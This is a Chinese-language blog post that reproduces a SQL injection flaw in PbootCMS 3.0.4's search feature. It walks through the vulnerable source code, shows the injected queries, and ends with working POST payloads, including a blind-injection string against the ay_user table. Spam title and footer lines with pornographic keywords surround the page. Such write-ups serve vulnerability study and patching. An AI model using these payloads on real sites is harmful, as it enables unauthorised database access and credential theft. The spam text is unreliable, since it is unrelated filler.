日日日日人人人夜夜夜2017_美女被c出白浆_国产精品毛片va一区二区三区_啪啪av大全导航福利网址

      pBootCMS 3.0.4 前臺(tái)注入漏洞復(fù)現(xiàn),Pbootcms文章,PB 教程,新手站長網(wǎng)
      • 首頁
      • 站長入門
        • 外貿(mào)建站
        • WooCommerce
        • 建站入門
        • 域名知識(shí)
        • 編程代碼
        • 工具資源
        • 網(wǎng)站優(yōu)化
        • 數(shù)據(jù)庫
        • 服務(wù)器
        • 小程序
        • 電商
        • 編程英語
      • Cms文章
        • wordpress
        • pbootcms
        • zblog
        • 易優(yōu)
        • 帝國cms
        • 迅睿
      • PB 教程
        • 新手入門教程
        • Pbootcms文章
        • 用戶使用手冊
        • 常見問題解答
        • pbootcms小程序
      • 應(yīng)用市場
      • 筆記分享
        • 網(wǎng)絡(luò)安全
        • 自媒體
        • 抖音
        • 快手
        • 其他
        • 手機(jī)技巧
      • 會(huì)員中心
      首頁 > PB 教程 > Pbootcms文章 >

      pBootCMS 3.0.4 前臺(tái)注入漏洞復(fù)現(xiàn)

      2022-07-23 發(fā)布在 Pbootcms文章0

      漏洞點(diǎn)跟進(jìn)

      • 網(wǎng)上公布漏洞點(diǎn)在/?p=search
        ,POST數(shù)據(jù):1=select 1
        ,

      1. apps/home/controller/ParserController.php
        的parserSearchLabel
        函數(shù)

      image-20211108160733164

      請求的數(shù)據(jù)賦值給$receive
      進(jìn)行遍歷,$key
      進(jìn)入request
      函數(shù)進(jìn)行處理

      1. 跟進(jìn)request
        函數(shù),文件core/function/helper.php

      image-20211108160421252

      標(biāo)定請求類型POST或GET
      ,構(gòu)造變量

      $condition = array(        'd_source' => 'post',        'd_type' => 'vars',        'd_require' => false,        $name => $key,        'd_default' => null    );

      傳遞給filter($name, $condition)

      1. 跟進(jìn)filter
        函數(shù),文件core/function/helper.php

      image-20211108161336349

      賦值$data = @$_POST@[$varname];
      ,并進(jìn)行去空格處理

      image-20211108161449842

      之后進(jìn)行類型檢測,正則匹配

      image-20211108161543059image-20211108161556813

      可以看到注入字符串只能包含中文、字母、數(shù)字、橫線、點(diǎn)、逗號(hào)、空格。

      最后進(jìn)行return escape_string($data);
      處理。

      1. 繼續(xù)跟進(jìn)escape_string
        函數(shù)。文件core/function/handle.php

      image-20211108161917276

      進(jìn)行了htmlspecialchars
      和addslashes
      轉(zhuǎn)義。

      1. 數(shù)據(jù)經(jīng)過一系列過濾后返回到apps/home/controller/ParserController.php
        文件的parserSearchLabel
        函數(shù),賦值給$where3
        數(shù)組。

      image-20211108162140400
      1. 繼續(xù)跟著變量$where3
        ,進(jìn)入到讀取數(shù)據(jù)函數(shù)$data = $this->model->getList($scode, $num, $order, $where1, $where2, $where3, $fuzzy, $start, $lfield, $lg);

        image-20211108162403932

      2. 跟進(jìn)getList
        函數(shù),文件apps/home/model/ParserModel.php

        image-20211108162741457

      函數(shù)中$select=$where3
      ,

      1. 繼續(xù)跟進(jìn)$select
        變量

        image-20211108162943901

      進(jìn)入where
      函數(shù)進(jìn)行處理

      9.繼續(xù)跟進(jìn)where
      函數(shù)


      image-20211108163233609

      可以看到條件之間使用AND
      進(jìn)行連接當(dāng)傳遞的參數(shù) $where
      是一個(gè)數(shù)組時(shí)就遍歷數(shù)組,當(dāng)$where
      是一個(gè)索引數(shù)組時(shí),則:$where_string.=$value
      。故而可以控制$where3
      為索引數(shù)組,進(jìn)而實(shí)現(xiàn)sql注入。

      payload數(shù)據(jù)流跟蹤

      • 進(jìn)行post請求搜索數(shù)據(jù)1=1
        時(shí),在$where3
        變量下斷點(diǎn)

        image-20211108164300567

        $where3=[1]

      • 繼續(xù)跟蹤sql語句構(gòu)造,經(jīng)過一些類轉(zhuǎn)換形成了sql語句SELECT COUNT(*) AS sum FROM ay_content a  LEFT JOIN ay_content_sort b ON a.scode=b.scode LEFT JOIN ay_content_sort c ON a.subscode=c.scode LEFT JOIN ay_model d ON b.mcode=d.mcode LEFT JOIN ay_member_group f ON a.gid=f.id LEFT JOIN ay_content_ext e ON a.id=e.contentid WHERE(a.scode in ('5','6','7') OR a.subscode='5') AND(a.status=1 AND d.type=2 AND a.date<'2021-11-08 16:49:33' AND a.acode='cn' ) AND(1)
        ,最后時(shí)把輸入的1=1
        轉(zhuǎn)換成了條件中的AND (1)

        image-20211108165408166

      • 查詢到所有信息

        image-20211108165755096

      • 當(dāng)post數(shù)據(jù)為1=0
        時(shí)沒抓到sql語句,用1=select 0
        抓到sql語句為SELECT COUNT(*) AS sum FROM ay_content a  LEFT JOIN ay_content_sort b ON a.scode=b.scode LEFT JOIN ay_content_sort c ON a.subscode=c.scode LEFT JOIN ay_model d ON b.mcode=d.mcode LEFT JOIN ay_member_group f ON a.gid=f.id LEFT JOIN ay_content_ext e ON a.id=e.contentid WHERE(a.scode in ('5','6','7') OR a.subscode='5') AND(a.status=1 AND d.type=2 AND a.date<'2021-11-08 17:00:56' AND a.acode='cn' ) AND(select 0)
        同樣添加了AND(select 0)
        語句,sql注入可行。

        image-20211108170258976


      image-20211108225320420

      漏洞利用

      • post傳輸數(shù)據(jù)1=select 1 from ay_user where username  regexp 0x61
        可以進(jìn)行盲注。

        image-20211108235622874






      如果您的問題還未解決可以聯(lián)系站長付費(fèi)協(xié)助。 加入我們

      有問題可以加入技術(shù)QQ群一起交流學(xué)習(xí)
      本站vip會(huì)員 請加入無憂模板網(wǎng) VIP群(50604020) PS:加入時(shí)備注用戶名或昵稱
      普通注冊會(huì)員或訪客 請加入無憂模板網(wǎng) 技術(shù)交流群(50604130)
      客服微信號(hào):15898888535
      聲明:本站所有文章資源內(nèi)容,如無特殊說明或標(biāo)注,均為采集網(wǎng)絡(luò)資源。如若內(nèi)容侵犯了原著者的合法權(quán)益,可聯(lián)系站長刪除。

      controller 漏洞點(diǎn) apps post 函數(shù) search 復(fù)現(xiàn) 前臺(tái) 數(shù)據(jù) 公布
      賞
      上一篇 pbootcms為啥要升級(jí)最新版本 漏洞修復(fù)
      下一篇 pbootcms網(wǎng)站后臺(tái)使用教程1 網(wǎng)址授權(quán)

      相關(guān)文章

      • PbootCMS網(wǎng)站模板安裝教程 PbootCMS新手安裝教程圖文詳細(xì)
      • 用wordpress中wp_postmeta數(shù)據(jù)過大清理垃圾數(shù)據(jù)
      • java連數(shù)據(jù)庫教程—java連接數(shù)據(jù)庫有幾種方法
      • sql數(shù)據(jù)庫語句教程(數(shù)據(jù)庫sql語句大全實(shí)例)
      • eyou易優(yōu)cms使用內(nèi)置的規(guī)則驗(yàn)證單個(gè)數(shù)據(jù)的方法
      • 網(wǎng)站建設(shè)前臺(tái)后臺(tái)教程;網(wǎng)站做了前臺(tái)如何跟后臺(tái)結(jié)合

      熱門

      • 1 PbootCMS網(wǎng)站模板安裝教程 PbootCMS新手安裝教程圖文詳細(xì)
      • 2 pbootcms授權(quán)方式 pbootcms官方網(wǎng)站打不開授權(quán)不了怎么辦
      • 3 PbootCMS文章列表沒有縮略圖時(shí)顯示指定的默認(rèn)圖片
      • 4 PbootCMS后臺(tái)關(guān)閉驗(yàn)證碼,登錄提示驗(yàn)證碼不能空的解決方法

      應(yīng)用市場

      • ¥100 采集文章自動(dòng)推送百度插件 PHP插件支持推送百度當(dāng)天文章

        ¥100 采集文章自動(dòng)推送百度插件 PHP插件支持推送百度當(dāng)天文章

        2025-01-19

      • ¥50 pbootcms副欄目多選功能 默認(rèn)只能多選一個(gè) 此插件可多選多個(gè)欄目

        ¥50 pbootcms副欄目多選功能 默認(rèn)只能多選一個(gè) 此插件可多選多個(gè)欄目

        2025-01-19

      • ¥200 網(wǎng)站維護(hù)/網(wǎng)站修改/問題解決/網(wǎng)站搬遷/php修改/asp修改/網(wǎng)站搬家

        ¥200 網(wǎng)站維護(hù)/網(wǎng)站修改/問題解決/網(wǎng)站搬遷/php修改/asp修改/網(wǎng)站搬家

        2025-01-19

      • ¥100  根據(jù)標(biāo)題生成圖片,文章頁自動(dòng)配標(biāo)題配圖,避免版權(quán)問題,所有cms通用php

        ¥100 根據(jù)標(biāo)題生成圖片,文章頁自動(dòng)配標(biāo)題配圖,避免版權(quán)問題,所有cms通用php

        2025-01-19

      熱門標(biāo)簽

      置頂   發(fā)短   撤銷   時(shí)光   Centos8   長度   發(fā)多   基礎(chǔ)庫   Helvetica   找到   NET   投資   有關(guān)   db   客戶機(jī)   HP   SEOer   創(chuàng)建   播放量   消費(fèi)者   工具欄   衛(wèi)生紙   專業(yè)版   nova8   申訴   低調(diào)   Neue   首先   業(yè)務(wù)   暴富   歷程   stripos   馬木馬   USB   苦惱   網(wǎng)址   博主   產(chǎn)品   文檔   爆單  
      • 站長入門
      • Cms文章
      • PB 教程
      • 應(yīng)用市場
      • 筆記分享
      • 會(huì)員中心
      • XML地圖

      Copyright ? 2018-2020 新手站長網(wǎng) All Rights Reserved.
      免責(zé)聲明:本站所有資源(模板、圖片、字體等)搜集整理于互聯(lián)網(wǎng)或者網(wǎng)友提供,僅供學(xué)習(xí)與交流使用,如果不小心侵犯到你的權(quán)益,請及時(shí)聯(lián)系我們刪除該資源,郵箱mcuv#qq.com。 魯ICP備2021016954號(hào)-3 網(wǎng)站模板

      實(shí)用工具

      覺得文章有用就打賞一下吧

      微信掃一掃打賞

      感谢您访问我们的网站,您可能还对以下资源感兴趣:

      日日日日人人人夜夜夜2017_美女被c出白浆_国产精品毛片va一区二区三区_啪啪av大全导航福利网址